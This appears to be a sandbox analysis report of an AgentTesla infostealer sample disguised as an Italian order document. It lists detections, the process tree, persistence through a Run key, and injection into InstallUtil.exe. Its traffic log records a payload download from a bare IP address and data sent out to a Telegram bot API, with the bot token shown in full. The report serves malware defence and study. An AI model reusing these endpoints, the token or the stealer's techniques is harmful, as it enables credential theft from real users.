Edit tour

Windows Analysis Report
Controllo saldo 30% Ordine 5667.exe

Overview

General Information

Sample Name:	Controllo saldo 30% Ordine 5667.exe
Analysis ID:	615179
MD5:	2b093d7f11c0d7047686a5477347de9c
SHA1:	ac5063aae56e0a299da195c305b117a2b8d648f0
SHA256:	3cff2b73d77305ffe8c02b009feca9ad0fbdbbbfeec0a1db831caa127f58ef73
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Sigma detected: Autorun Keys Modification

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Controllo saldo 30% Ordine 5667.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe" MD5: 2B093D7F11C0D7047686A5477347DE9C)

cmd.exe (PID: 4592 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 5 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 4568 cmdline: timeout 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

InstallUtil.exe (PID: 6104 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

Vajejvz.exe (PID: 3140 cmdline: "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe" MD5: 2B093D7F11C0D7047686A5477347DE9C)

cmd.exe (PID: 5188 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 5 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Vajejvz.exe (PID: 2264 cmdline: "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe" MD5: 2B093D7F11C0D7047686A5477347DE9C)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000B.00000002.691821194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.691821194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000B.00000000.561644091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000000.561644091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000B.00000000.560802331.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000000.560802331.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Controllo saldo 30% Ordine 5667.exe PID: 6876	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 6104	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 6104	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 6104	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.3.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
14.2.Vajejvz.exe.4009990.1.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x18302d:$i2: sserddAcorPteG 0x18303c:$i3: AyrarbiLdaoL
0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e5a:$s10: logins 0x308c1:$s11: credential 0x2cdf7:$g1: get_Clipboard 0x2ce05:$g2: get_Keyboard 0x2ce12:$g3: get_Password 0x2e0fc:$g4: get_CtrlKeyDown 0x2e10c:$g5: get_ShiftKeyDown 0x2e11d:$g6: get_AltKeyDown
11.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
0.3.Controllo saldo 30% Ordine 5667.exe.3799970.1.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x20604d:$i2: sserddAcorPteG 0x20605c:$i3: AyrarbiLdaoL
0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e5a:$s10: logins 0x308c1:$s11: credential 0x2cdf7:$g1: get_Clipboard 0x2ce05:$g2: get_Keyboard 0x2ce12:$g3: get_Password 0x2e0fc:$g4: get_CtrlKeyDown 0x2e10c:$g5: get_ShiftKeyDown 0x2e11d:$g6: get_AltKeyDown
11.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
13.2.Vajejvz.exe.3509990.2.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x18302d:$i2: sserddAcorPteG 0x18303c:$i3: AyrarbiLdaoL
11.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
11.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
0.3.Controllo saldo 30% Ordine 5667.exe.3819990.2.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x18302d:$i2: sserddAcorPteG 0x18303c:$i3: AyrarbiLdaoL
11.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
11.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
11.0.InstallUtil.exe.400000.4.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c5a:$s10: logins 0x326c1:$s11: credential 0x2ebf7:$g1: get_Clipboard 0x2ec05:$g2: get_Keyboard 0x2ec12:$g3: get_Password 0x2fefc:$g4: get_CtrlKeyDown 0x2ff0c:$g5: get_ShiftKeyDown 0x2ff1d:$g6: get_AltKeyDown
0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x5ac7a:$s10: logins 0x5a6e1:$s11: credential 0x56c17:$g1: get_Clipboard 0x56c25:$g2: get_Keyboard 0x56c32:$g3: get_Password 0x57f1c:$g4: get_CtrlKeyDown 0x57f2c:$g5: get_ShiftKeyDown 0x57f3d:$g6: get_AltKeyDown
14.2.Vajejvz.exe.4009990.1.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x18602d:$i2: sserddAcorPteG 0x18603c:$i3: AyrarbiLdaoL
14.2.Vajejvz.exe.3f89970.3.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x20604d:$i2: sserddAcorPteG 0x20605c:$i3: AyrarbiLdaoL
13.2.Vajejvz.exe.3489970.1.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x20604d:$i2: sserddAcorPteG 0x20605c:$i3: AyrarbiLdaoL
13.2.Vajejvz.exe.3509990.2.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x18602d:$i2: sserddAcorPteG 0x18603c:$i3: AyrarbiLdaoL
0.3.Controllo saldo 30% Ordine 5667.exe.3819990.2.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x18602d:$i2: sserddAcorPteG 0x18603c:$i3: AyrarbiLdaoL
Click to see the 37 entries

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe, ProcessId: 6876, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Vajejvz

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe, ProcessId: 6876, TargetFilename: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentCommandLine: "C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe" , ParentImage: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe, ParentProcessId: 6876, ParentProcessName: Controllo saldo 30% Ordine 5667.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6104, ProcessName: InstallUtil.exe

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c timeout 5, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3060, ProcessName: conhost.exe

Snort Signatures

ET TROJAN Maldoc Activity (set) - Source IP: 192.168.2.5 - Destination IP: 45.137.22.163

Timestamp:	04/25/22-20:44:10.068097 04/25/22-20:44:10.068097
SID:	2034631
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Controllo saldo 30% Ordine 5667.exe	Virustotal: Detection: 28%			Perma Link
Source: Controllo saldo 30% Ordine 5667.exe	ReversingLabs: Detection: 21%

Antivirus detection for URL or domain

Source: http://45.137.22.163/bless_Jkvszuhw.png

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://45.137.22.163

Virustotal: Detection: 16%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: Controllo saldo 30% Ordine 5667.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe

Joe Sandbox ML: detected

Source: 11.0.InstallUtil.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 11.0.InstallUtil.exe.400000.2.unpack	Avira: Label: TR/Spy.Gen8
Source: 11.0.InstallUtil.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 11.0.InstallUtil.exe.400000.3.unpack	Avira: Label: TR/Spy.Gen8
Source: 11.0.InstallUtil.exe.400000.1.unpack	Avira: Label: TR/Spy.Gen8
Source: 11.2.InstallUtil.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8

Source: Controllo saldo 30% Ordine 5667.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49802 version: TLS 1.2

Source: Controllo saldo 30% Ordine 5667.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.5:49748 -> 45.137.22.163:80

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da26ffe4b41c47Host: api.telegram.orgContent-Length: 1025Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da26fc8d07fd83Host: api.telegram.orgContent-Length: 1025Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163

Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564464486.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.695840946.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.695269778.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.163
Source: Vajejvz.exe, Vajejvz.exe, 0000000E.00000000.600726961.0000000000AC2000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://45.137.22.163/bless_Jkvszuhw.png
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564464486.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.695840946.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.695269778.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.163/bless_Jkvszuhw.pngt%Em
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: InstallUtil.exe, 0000000B.00000002.697823623.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 0000000B.00000002.698836717.00000000060F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: InstallUtil.exe, 0000000B.00000002.698901290.0000000006130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.veris&v
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gSjTzr.com
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564464486.0000000002731000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.695840946.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.695269778.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
